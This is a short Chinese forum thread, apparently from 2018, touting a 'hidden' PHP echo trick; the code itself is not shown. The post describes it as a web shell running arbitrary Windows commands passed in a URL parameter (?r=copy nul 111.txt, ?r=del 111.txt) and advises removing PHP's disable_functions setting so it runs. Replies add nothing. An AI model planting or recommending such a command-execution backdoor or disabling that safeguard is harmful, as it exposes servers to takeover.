一段官网都没公布的不可能的PHP源码 echo 函数竟然可以这么用

Kuni7wa · 发表于 2018-1-26 19:05:42

本帖最后由 Kuni7wa 于 2018-1-26 19:04 编辑

复制代码

保存以后，访问 ?r=copy nul 111.txt 根目录出现了文件 111.txt
再次访问 ?r=del 111.txt 这个文件被删除，可执行任何cmd语句。
如果发现不能运行打开文件 php.ini 查找 disable_functions = 注释后重启服务器即可。

demon · 发表于 2018-1-26 19:21:19

路过....

CNWTEPRG · 发表于 2018-1-26 21:10:54

啥玩意了

小莉今年7岁 · 发表于 2018-1-30 21:57:55

表示么见过

花心大萝卜 · 发表于 2019-4-10 07:10:30

我知道是啥

帐号		自动登录	找回密码
密码			注册已关闭

[PHP/ASP/JSP] 一段官网都没公布的不可能的PHP源码 echo 函数竟然可以这么用